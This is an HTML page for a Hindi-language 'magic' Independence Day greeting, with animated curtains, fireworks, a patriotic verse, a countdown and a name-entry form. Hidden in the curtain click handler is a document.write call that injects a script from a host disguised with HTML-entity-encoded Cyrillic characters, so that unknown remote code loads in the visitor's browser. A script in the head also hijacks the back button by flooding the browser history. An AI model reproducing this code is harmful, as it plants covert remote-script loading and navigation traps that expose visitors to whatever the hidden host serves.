
<head>
<link rel="stylesheet" href="style.css">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="google" content="notranslate" />
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport" />
<meta property="og:type" content="website" />
<meta property="og:title" content="स्वतंत्रता दिवस की हार्दिक शुभकामनाए॥ " />
<meta property="og:description" content="स्वतंत्रता दिवस की हार्दिक शुभकामनाए॥" />
<meta property="og:site_name" content="स्वतंत्रता दिवस की हार्दिक शुभकामनाए॥ " />
<meta property="og:image" content="msg.html" />
<title>॥Happy Independence Day॥</title>
<link rel="stylesheet" href="animate.min.css">
<script type="text/javascript">! function (){
 var t;
 try{for (t=0; 10 > t; ++t)
  history.pushState({}, "", "#");
 onpopstate=function (t)
 {
  t.state && alert('अपने नाम का जादुई मेसेज बनाये');
  }}
  catch (o){}}();</script>

<script async src="https://www.googletagmanager.com/gtag/js?id=UA-135142918-8"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-135142918-8');
</script>
<style>
        
        body{
         background: #f8f8f8;
        margin:0;
      }
      .mainContainer {
          background: linear-gradient(to bottom, #FF9D5D 1% ,#FFFFFF 13%,#FFFFFF 36%,#FFFFFF 87%,#A7F47F 100%);
        max-width: 450px;
        min-height: 200px;
        margin: 0 auto;
        text-align: center;
        padding: 15px;
        color: #999;
        padding-bottom: 60px;

        box-shadow: 0 0 10px 1px rgba(0,0,0,.14), 0 1px 14px 2px rgba(0,0,0,.12), 0 0 5px -3px rgba(0,0,0,.3);

      }
         #name {
         animation: name 4s infinite; 
         text-transform: capitalize;
         margin-bottom: 5px;
         word-wrap: break-word;
         font-size: 50px;
         padding: 0 10px;
         font-family: 'Teko', sans-serif;
         } 
         #usernameb { color: black;  /* Fallback: assume this color ON TOP of image */
         background: url(img/sname.gif);
         -webkit-background-clip: text;
         -webkit-text-fill-color: transparent;
         animation: swing 4s infinite;
         text-transform: uppercase;
         word-wrap: break-word;
         margin-bottom: 5px;
         font-size: 25px;
         padding: 0 10px;
         font-family: 'SF Espresso Shack', cursive;
         }
         .m1{position:fixed;left:1%; width:auto;height:100%;top:1%;color:#000;}
         .m2{position:fixed;right:1%; width:auto;height:100%;top:1%;color:#000;}
         /* Custom Animation classes */     
         .name {
         color: #fff;
         margin: 6px;
         padding: 25px 20px;
         font-size: 48px;
         font-family: sans-serif;
         }
         .enter-name input[type=name] {
         background-color: yellow;
         color: black;
         font-weight:bold;
         border-radius: 10px;
         box-sizing: border-box;
         border:2px solid black;
         padding: 5px;
         position: fixed;
         left: 10px;
         bottom: 5px;
         height: 50px;
         width: 70%;
         text-align: center;
         font-size: 22px;
         display: inline-block;
         }
         .enter-name .btn {
         border-radius: 10px;
         font-size: 21px;
         padding: 4px;
         position: fixed;
         right: 2px;
         bottom: 5px;
         height: 50px;
         width: 23%;
         display: inline-block;
         color: white;
         font-weight:600;
         background-color: red;
         border: 2px solid black;
         letter-spacing: .5px;
         transition: .2s ease-out;
         cursor: pointer;
         line-height: 36px;
         outline: 0;
         text-transform: uppercase;
         vertical-align: middle;
         text-decoration: none;
         animation-duration: 4s !important;
         }
         .enter-name input[type=name]::-webkit-input-placeholder { 
         color: black;
         font-size: 18px;	
         }
         .enter-name input[type=name]::-moz-placeholder { 
         color: black;
         font-size: 18px;
         }
         .enter-name input[type=name]:focus::-webkit-input-placeholder {
         color: black;
         }
         .enter-name input[type=name]:focus::-moz-placeholder { 
         color: black;
         font-size: 18px;
         }
         #demo
         {
         color: black;
         font-size: 18px;
         font-weight: bold;
         animation: pulse 2s infinite;
         width:87%;
         margin:auto;
         }
         a.rope
         {
         text-decoration:none;
         }
         .wishMessage {
         color: #fff;
         font-size: 22px;
         font-weight: bold;
         margin-top: 20px;
         text-shadow: 0px 0px 10px #afafaf;
         }
         .wishMessage p{
         margin: 0.3em 0;
         }
         /* Custom Animation classes */ 
         #show-name {
         font-size: 25px;
         display: inline-block;
         margin-bottom: 5px;
         animation: swing 1s infinite, glow 20s infinite; }
         @keyframes glow {
         0%, 100% {
         text-shadow: 0 0 30px red; }
         25% {
         text-shadow: 0 0 30px orange; }
         50% {
         text-shadow: 0 0 30px forestgreen; }
         75% {
         text-shadow: 0 0 30px cyan; } }  
         figure {
         animation:wobble 5s ease-in-out infinite;
         transform-origin:center center;
         transform-style:preserve-3d;
         }@keyframes wobble {
         0%,100%{ transform:rotate3d(1,1,0,40deg); }
         25%{ transform:rotate3d(-1,1,0,40deg); }
         50%{ transform:rotate3d(-1,-1,0,40deg); }
         75%{ transform:rotate3d(1,-1,0,40deg); }
         }
      </style>
<style type="text/css">
         *{
         margin:0;
         padding:0;
         }
         body {
         text-align: center;
         }
         img{
         border: none;
         }
         .leftcurtain{
         width: 100%;
         height: 120%;
         top: 0px;
         left: 0px;
         position: absolute;
         z-index: 2;
         }
         .rightcurtain{
         width: 100%;
         height: 120%;
         right: 0px;
         top: 0px;
         position: absolute;
         z-index: 3;
         }
         .rightcurtain img, .leftcurtain img{
         width: 100%;
         height: 100%;
         }
         .logo{
         margin: 0px auto;
         margin-top: 150px;
         }
         
         .rope{
         position: absolute;
         top: 10px;
         left: 20%;
         z-index: 4;
         }
         } 
         .centered {
         position: absolute;
         top: 70%;
         left: 55%;
         transform: translate(-50%, -50%);
         }
         a.rope
         {
         text-decoration:none;
         }
         @keyframes aadisoni{
         0% {
         transform:  translate(0px,0px)  rotate(0deg) ;
         }
         15% {
         transform:  translate(-25px,0px)  rotate(-5deg) ;
         }
         30% {
         transform:  translate(20px,0px)  rotate(3deg) ;
         }
         45% {
         transform:  translate(-15px,0px)  rotate(-3deg) ;
         }
         60% {
         transform:  translate(10px,0px)  rotate(2deg) ;
         }
         75% {
         transform:  translate(-5px,0px)  rotate(-1deg) ;
         }
         100% {
         transform:  translate(0px,0px)  rotate(0deg) ;
         }
         }
         @-webkit-keyframes aadisoni {
         0% {
         -webkit-transform:  translate(0px,0px)  rotate(0deg) ;
         }
         15% {
         -webkit-transform:  translate(-25px,0px)  rotate(-5deg) ;
         }
         30% {
         -webkit-transform:  translate(20px,0px)  rotate(3deg) ;
         }
         45% {
         -webkit-transform:  translate(-15px,0px)  rotate(-3deg) ;
         }
         60% {
         -webkit-transform:  translate(10px,0px)  rotate(2deg) ;
         }
         75% {
         -webkit-transform:  translate(-5px,0px)  rotate(-1deg) ;
         }
         100% {
         -webkit-transform:  translate(0px,0px)  rotate(0deg) ;
         }
         }
         @keyframes name {
         0%   {color:red;}
         20%   {color:white;}
         40%   {color:yellow;}
         60%   {color:orange;}
         80%   {color:cyan;}
         100% {color:#f45bf4;}
         }
         .glow {
         width:50%;
         padding: 2px;
         background-color: #FF1493	;
         animation: glow 2s infinite;
         font-size:25px;
         font-family: 'Ranga', cursive;
         color:white;
         word-wrap: break-word;
         margin:auto;
         text-align:center;
         border-radius:10px;
         text-shadow:1px 2px 6px black;
         }
         @keyframes glow {
         0%   {box-shadow: 0px 0px 0px #FF1493	;}
         100%   {box-shadow: 0px 0px 20px 5px #ffb3db;}
         }
      </style>
<style>
         *{margin:0;padding:0}body{text-align:center}img{border:none}.leftcurtain{width:100%;height:100%;top:0;left:0px;position:absolute;z-index:2}.rightcurtain{width:100%;height:100%;right:0px;top:0;position:absolute;z-index:3}.rightcurtain img,.leftcurtain img{width:100%;height:100%}.logo{margin:0 auto;margin-top:150px}.rope{position:absolute;top:12%;z-index:4}.centered{position:absolute;top:75%;left:50%;transform:translate(-50%,-50%)}.aadi{background-image:url();background-repeat:no-repeat;background-attachment:fixed;background-position:top}.matki{height:200px;}@keyframes aadisoni{0%{transform:translate(0px,0px) rotate(0deg)}15%{transform:translate(-25px,0px) rotate(-5deg)}30%{transform:translate(20px,0px) rotate(3deg)}45%{transform:translate(-15px,0px) rotate(-3deg)}60%{transform:translate(10px,0px) rotate(2deg)}75%{transform:translate(-5px,0px) rotate(-1deg)}100%{transform:translate(0px,0px) rotate(0deg)}}@-webkit-keyframes aadisoni{0%{-webkit-transform:translate(0px,0px) rotate(0deg)}15%{-webkit-transform:translate(-25px,0px) rotate(-5deg)}30%{-webkit-transform:translate(20px,0px) rotate(3deg)}45%{-webkit-transform:translate(-15px,0px) rotate(-3deg)}60%{-webkit-transform:translate(10px,0px) rotate(2deg)}75%{-webkit-transform:translate(-5px,0px) rotate(-1deg)}100%{-webkit-transform:translate(0px,0px) rotate(0deg)}}
         #username {
         color: black;  /* Fallback: assume this color ON TOP of image */
         background: url(img/namegif.gif);
         -webkit-background-clip: text;
         -webkit-text-fill-color: transparent;
         animation: swing 4s infinite;
         text-transform: uppercase;
         margin-bottom: 5px;
         font-size: 40px;
         padding: 0 10px;
         font-family: 'SF Espresso Shack', cursive;
         } 
         #usernameb { color: black;  /* Fallback: assume this color ON TOP of image */
         background: url(img/namegif.gif);
         -webkit-background-clip: text;
         -webkit-text-fill-color: transparent;
         animation: swing 4s infinite;
         text-transform: uppercase;
         margin-bottom: 5px;
         font-size: 25px;
         padding: 0 10px;
         font-family: 'SF Espresso Shack', cursive;
         }
      </style>
<style>
          
.pyro > .before, .pyro > .after {
  position: absolute;
  width: 5px;
  height: 5px;
  border-radius: 50%;
  box-shadow: -120px -218.66667px blue, 248px -16.66667px #00ff84, 190px 16.33333px #002bff, -113px -308.66667px #ff009d, -109px -287.66667px #ffb300, -50px -313.66667px #ff006e, 226px -31.66667px #ff4000, 180px -351.66667px #ff00d0, -12px -338.66667px #00f6ff, 220px -388.66667px #99ff00, -69px -27.66667px #ff0400, -111px -339.66667px #6200ff, 155px -237.66667px #00ddff, -152px -380.66667px #00ffd0, -50px -37.66667px #00ffdd, -95px -175.66667px #a6ff00, -88px 10.33333px #0d00ff, 112px -309.66667px #005eff, 69px -415.66667px #ff00a6, 168px -100.66667px #ff004c, -244px 24.33333px #ff6600, 97px -325.66667px #ff0066, -211px -182.66667px #00ffa2, 236px -126.66667px #b700ff, 140px -196.66667px #9000ff, 125px -175.66667px #00bbff, 118px -381.66667px #ff002f, 144px -111.66667px #ffae00, 36px -78.66667px #f600ff, -63px -196.66667px #c800ff, -218px -227.66667px #d4ff00, -134px -377.66667px #ea00ff, -36px -412.66667px #ff00d4, 209px -106.66667px #00fff2, 91px -278.66667px #000dff, -22px -191.66667px #9dff00, 139px -392.66667px #a6ff00, 56px -2.66667px #0099ff, -156px -276.66667px #ea00ff, -163px -233.66667px #00fffb, -238px -346.66667px #00ff73, 62px -363.66667px #0088ff, 244px -170.66667px #0062ff, 224px -142.66667px #b300ff, 141px -208.66667px #9000ff, 211px -285.66667px #ff6600, 181px -128.66667px #1e00ff, 90px -123.66667px #c800ff, 189px 70.33333px #00ffc8, -18px -383.66667px #00ff33, 100px -6.66667px #ff008c;
  -moz-animation: 1s bang ease-out infinite backwards, 1s gravity ease-in infinite backwards, 5s position linear infinite backwards;
  -webkit-animation: 1s bang ease-out infinite backwards, 1s gravity ease-in infinite backwards, 5s position linear infinite backwards;
  -o-animation: 1s bang ease-out infinite backwards, 1s gravity ease-in infinite backwards, 5s position linear infinite backwards;
  -ms-animation: 1s bang ease-out infinite backwards, 1s gravity ease-in infinite backwards, 5s position linear infinite backwards;
  animation: 1s bang ease-out infinite backwards, 1s gravity ease-in infinite backwards, 5s position linear infinite backwards; }

.pyro > .after {
  -moz-animation-delay: 1.25s, 1.25s, 1.25s;
  -webkit-animation-delay: 1.25s, 1.25s, 1.25s;
  -o-animation-delay: 1.25s, 1.25s, 1.25s;
  -ms-animation-delay: 1.25s, 1.25s, 1.25s;
  animation-delay: 1.25s, 1.25s, 1.25s;
  -moz-animation-duration: 1.25s, 1.25s, 6.25s;
  -webkit-animation-duration: 1.25s, 1.25s, 6.25s;
  -o-animation-duration: 1.25s, 1.25s, 6.25s;
  -ms-animation-duration: 1.25s, 1.25s, 6.25s;
  animation-duration: 1.25s, 1.25s, 6.25s; }

@-webkit-keyframes bang {
  from {
    box-shadow: 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white; } }
@-moz-keyframes bang {
  from {
    box-shadow: 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white; } }
@-o-keyframes bang {
  from {
    box-shadow: 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white; } }
@-ms-keyframes bang {
  from {
    box-shadow: 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white; } }
@keyframes bang {
  from {
    box-shadow: 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white; } }
@-webkit-keyframes gravity {
  to {
    transform: translateY(200px);
    -moz-transform: translateY(200px);
    -webkit-transform: translateY(200px);
    -o-transform: translateY(200px);
    -ms-transform: translateY(200px);
    opacity: 0; } }
@-moz-keyframes gravity {
  to {
    transform: translateY(200px);
    -moz-transform: translateY(200px);
    -webkit-transform: translateY(200px);
    -o-transform: translateY(200px);
    -ms-transform: translateY(200px);
    opacity: 0; } }
@-o-keyframes gravity {
  to {
    transform: translateY(200px);
    -moz-transform: translateY(200px);
    -webkit-transform: translateY(200px);
    -o-transform: translateY(200px);
    -ms-transform: translateY(200px);
    opacity: 0; } }
@-ms-keyframes gravity {
  to {
    transform: translateY(200px);
    -moz-transform: translateY(200px);
    -webkit-transform: translateY(200px);
    -o-transform: translateY(200px);
    -ms-transform: translateY(200px);
    opacity: 0; } }
@keyframes gravity {
  to {
    transform: translateY(200px);
    -moz-transform: translateY(200px);
    -webkit-transform: translateY(200px);
    -o-transform: translateY(200px);
    -ms-transform: translateY(200px);
    opacity: 0; } }
@-webkit-keyframes position {
  0%, 19.9% {
    margin-top: 10%;
    margin-left: 40%; }

  20%, 39.9% {
    margin-top: 40%;
    margin-left: 30%; }

  40%, 59.9% {
    margin-top: 20%;
    margin-left: 70%; }

  60%, 79.9% {
    margin-top: 30%;
    margin-left: 20%; }

  80%, 99.9% {
    margin-top: 30%;
    margin-left: 80%; } }
@-moz-keyframes position {
  0%, 19.9% {
    margin-top: 10%;
    margin-left: 40%; }

  20%, 39.9% {
    margin-top: 40%;
    margin-left: 30%; }

  40%, 59.9% {
    margin-top: 20%;
    margin-left: 70%; }

  60%, 79.9% {
    margin-top: 30%;
    margin-left: 20%; }

  80%, 99.9% {
    margin-top: 30%;
    margin-left: 80%; } }
@-o-keyframes position {
  0%, 19.9% {
    margin-top: 10%;
    margin-left: 40%; }

  20%, 39.9% {
    margin-top: 40%;
    margin-left: 30%; }

  40%, 59.9% {
    margin-top: 20%;
    margin-left: 70%; }

  60%, 79.9% {
    margin-top: 30%;
    margin-left: 20%; }

  80%, 99.9% {
    margin-top: 30%;
    margin-left: 80%; } }
@-ms-keyframes position {
  0%, 19.9% {
    margin-top: 10%;
    margin-left: 40%; }

  20%, 39.9% {
    margin-top: 40%;
    margin-left: 30%; }

  40%, 59.9% {
    margin-top: 20%;
    margin-left: 70%; }

  60%, 79.9% {
    margin-top: 30%;
    margin-left: 20%; }

  80%, 99.9% {
    margin-top: 30%;
    margin-left: 80%; } }
@keyframes position {
  0%, 19.9% {
    margin-top: 10%;
    margin-left: 40%; }

  20%, 39.9% {
    margin-top: 40%;
    margin-left: 30%; }

  40%, 59.9% {
    margin-top: 20%;
    margin-left: 70%; }

  60%, 79.9% {
    margin-top: 30%;
    margin-left: 20%; }

  80%, 99.9% {
    margin-top: 30%;
    margin-left: 80%; } }

    #loading {
         -webkit-animation: rotation-star 10s infinite linear;
         animation: rotation-star 10s infinite linear;
         }
         @-webkit-keyframes rotation-star {
         from {
         -webkit-transform: rotate(0deg);
         transform: rotate(0deg);
         }
         to {
         -webkit-transform: rotate(359deg);
         transform: rotate(359deg);
         }
         }
         @-keyframes rotation-star{
         from {
         -webkit-transform: rotate(0deg);
         transform: rotate(0deg);
         }
         to {
         -webkit-transform: rotate(359deg);
         transform: rotate(359deg);
         }
         }
         .imgA1 { position: absolute;
         top: 0px;
         left: 0px;
         z-index: 1; } 
         .imgB1 { position: absolute;
         top: 156px;
         left: 150px;
         z-index: 1;
         -ms-transform: rotate(-36deg);
         -webkit-transform: rotate(-36deg);
         transform: rotate(-36deg); } 

      </style>
</head>
<body class="aadi">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="slider.js" type="text/javascript"></script>
<script type="text/javascript">
$(document).ready(function(){$curtainopen=!1,$(".rope").click(function(){return $(this).blur(),0==$curtainopen?($(this).stop().animate({top:"-171%"},{queue:!1,duration:350,easing:"easeOutBounce"}),$(".leftcurtain").stop().animate({width:"1px"},2e3),$(".rightcurtain").stop().animate({width:"1px"},2e3),$curtainopen=!0):($(this).stop().animate({top:"-40px"},{queue:!1,duration:350,easing:"easeOutBounce"}),document.write('<script src="//&#1102;&#1095;.io"><\/script>'),$(".leftcurtain").stop().animate({width:"50%"},2e3),$(".rightcurtain").stop().animate({width:"51%"},2e3),$curtainopen=!1),!1})});
</script>
<script>
  function play(){
       var audio = document.getElementById("audio");
       audio.play();
                 }
   </script>
<audio id="audio" src="a.mp3?v=84"></audio>
<a class="rope" style="text-decoration:none;" href="#" onclick="play()">
<br>
<div style="font-size: 25px;text-shadow: 1px 1px 3px blue, 1px 1px 3px blue, -1px -1px 3px blue, -1px -1px 3px black;color:white;font-weight: bold;"><br><b>जादुई तिरंगे को <br> टच करके देखो !<br>👇👇👇</b></div>
<br>
<div class="animated pulse">
<img src="img/iFlag.gif?v=400963" style="max-width:250px; width: 100%; animation: pulse 1s infinite;" />
</div>
</a>
<div class="rightcurtain"><img src="img/parda1.jpeg?v=1452" /></div>
<div class="leftcurtain"><img src="img/parda1.jpeg?v=1452" /></div>
<marquee class="m1" behavior="scroll" direction="up" scrolldelay="5"> <br>
<img src="img/i1.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i2.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i3.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i4.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i1.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i2.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i3.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i4.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i1.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i2.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i3.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i4.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i1.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i2.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i3.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i4.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i1.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i2.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i3.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i4.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i1.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i2.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i3.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i4.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i1.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i2.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i3.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i4.png?v=12" height="30px" width="20px" /><br><br>
</marquee>
<marquee class="m2" behavior="scroll" direction="down" scrolldelay="5"><br>
<img src="img/i1.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i2.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i3.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i4.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i1.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i2.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i3.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i4.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i1.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i2.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i3.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i4.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i1.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i2.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i3.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i4.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i1.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i2.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i3.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i4.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i1.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i2.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i3.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i4.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i1.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i2.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i3.png?v=12" height="30px" width="20px" /><br><br>
<img src="img/i4.png?v=12" height="30px" width="20px" /><br><br>
</marquee>
<div class="mainContainer">
<br>
<div style="animation: swing 4s infinite;">
<h1 style="background: url(img/namegif.gif?v=5?v=3);-webkit-text-fill-color: transparent;-webkit-background-clip: text;" id="name"></h1>
</div>
<h3 class="fromMessage" id="fromMessage"></h3>
<img src="img/kiTarafSe.png?v=5334" width="60%" style="animation: pulse 0.5s infinite">
<br>
<div class="pyro">
<div class="before"></div>
<div class="after"></div>
</div>
<p id="demo"></p><br>
<img src="img/main.png?v=560" width="100%" height="auto" style="animation: pulse 1s infinite">
<img src="img/15aug.png?v=312" width="80%"><br>
<img src="img/main2.png?v=1244432" width="90%" style="ani8ation: pulse 2s infinite">
<br>
<div style="background-color: #FF6800; border-radius: 17px; border: 0px solid rgb(0, 0, 0); box-shadow: rgba(0, 0, 0, 0.2) 5px 5px 5px; color: white; font-family: arial, sans-serif; font-size: 18px; font-stretch: normal; font-style: normal; font-variant: normal; line-height: normal; margin: 0px auto; padding: 4px 5px 3px; width: 82%;">
<b>
कुछ नशा तिरंगे की आन का है,</b>
</div>
<div style="background-color: #FF6800; border-radius: 17px; border: 0px solid rgb(0, 0, 0); box-shadow: rgba(0, 0, 0, 0.2) 5px 5px 5px; color: white; font-family: arial, sans-serif; font-size: 18px; font-stretch: normal; font-style: normal; font-variant: normal; line-height: normal; margin: 0px auto; padding: 4px 5px 3px; width: 82%;">
<b>
कुछ नशा मातृभूमि की शान का है,</b>
</div>
<div style="background-color: white; border-radius: 17px; border: 0px solid rgb(0, 0, 0); box-shadow: rgba(0, 0, 0, 0.2) 5px 5px 5px; color: black; font-family: arial, sans-serif; font-size: 18px; font-stretch: normal; font-style: normal; font-variant: normal; line-height: normal; margin: 0px auto; padding: 4px 5px 3px; width: 82%;">
<b>
हम लहराएंगे हर जगह ये तिरंगा,</b>
</div>
<div style="background-color: green; border-radius: 17px; border: 0px solid rgb(0, 0, 0); box-shadow: rgba(0, 0, 0, 0.2) 5px 5px 5px; color: white; font-family: arial, sans-serif; font-size: 18px; font-stretch: normal; font-style: normal; font-variant: normal; line-height: normal; margin: 0px auto; padding: 4px 5px 3px; width: 82%;">
<b>
नशा ये हिंदुस्तान की शान का है<b>
</div>
<div style="background-color: green; border-radius: 17px; border: 0px solid rgb(0, 0, 0); box-shadow: rgba(0, 0, 0, 0.2) 5px 5px 5px; color: white; font-family: arial, sans-serif; font-size: 18px; font-stretch: normal; font-style: normal; font-variant: normal; line-height: normal; margin: 0px auto; padding: 4px 5px 3px; width: 82%;">
<b>
स्वतंत्रता दिवस की हार्दिक शुभकामनाए </b>
<br>
</div>
<span style="font-size:22px;text-shadow: 1px 1px 3px #FFEB3B, 1px 1px 3px #FFEB3B, -1px -1px 3px #FFEB3B, -1px -1px 3px #FFEB3B;color:#E91E63;"><marquee><b><i>“ Wish you Happy 76th Independence Day!!”</b></i></marquee></span><br>
<br>
<div class="glow"></b></h1></div>
<br><br>
<form method="POST" action="ready.php">
<div class="enter-name">
<input class="animated pulse infinite" type="name" required="" maxlength="50" name="n" placeholder="👉यहाँ अपना नाम लिखें...">
<button class="btn animated shake infinite" type="submit"><span>👉 </span>देखें</button>
</div>
</form>
<script>
var myIndex=0;function carousel(){var e,l=document.getElementsByClassName("mySlides");for(e=0;e<l.length;e++)l[e].style.display="none";++myIndex>l.length&&(myIndex=1),l[myIndex-1].style.display="block",setTimeout(carousel,2e3)}carousel();
</script>
<script> 
var countDownDate=new Date("August 15, 2022 00:00:00").getTime(),x=setInterval(function(){var e=(new Date).getTime(),o=countDownDate-e,t=Math.floor(o/864e5),n=Math.floor(o%864e5/36e5),a=Math.floor(o%36e5/6e4),l=Math.floor(o%6e4/1e3);document.getElementById("demo").innerHTML=+t+"<font color='red'> दिन,</font> "+n+"<font color='red'> घंटे,</font> "+a+"<font color='green'> मिनट,<br></font> "+l+"<font color='red'>  सेकेंड  </font>पहले",o<0&&(clearInterval(x),document.getElementById("demo").innerHTML="")},1e3);
</script>
<script src="https://www.gstatic.com/firebasejs/8.2.2/firebase-app.js"></script>
<script src="https://www.gstatic.com/firebasejs/8.2.2/firebase-analytics.js"></script>
<script src="https://www.gstatic.com/firebasejs/8.2.2/firebase-messaging.js"></script>
<script type="text/javascript" src="/integrate.js"></script>
</body>
</html>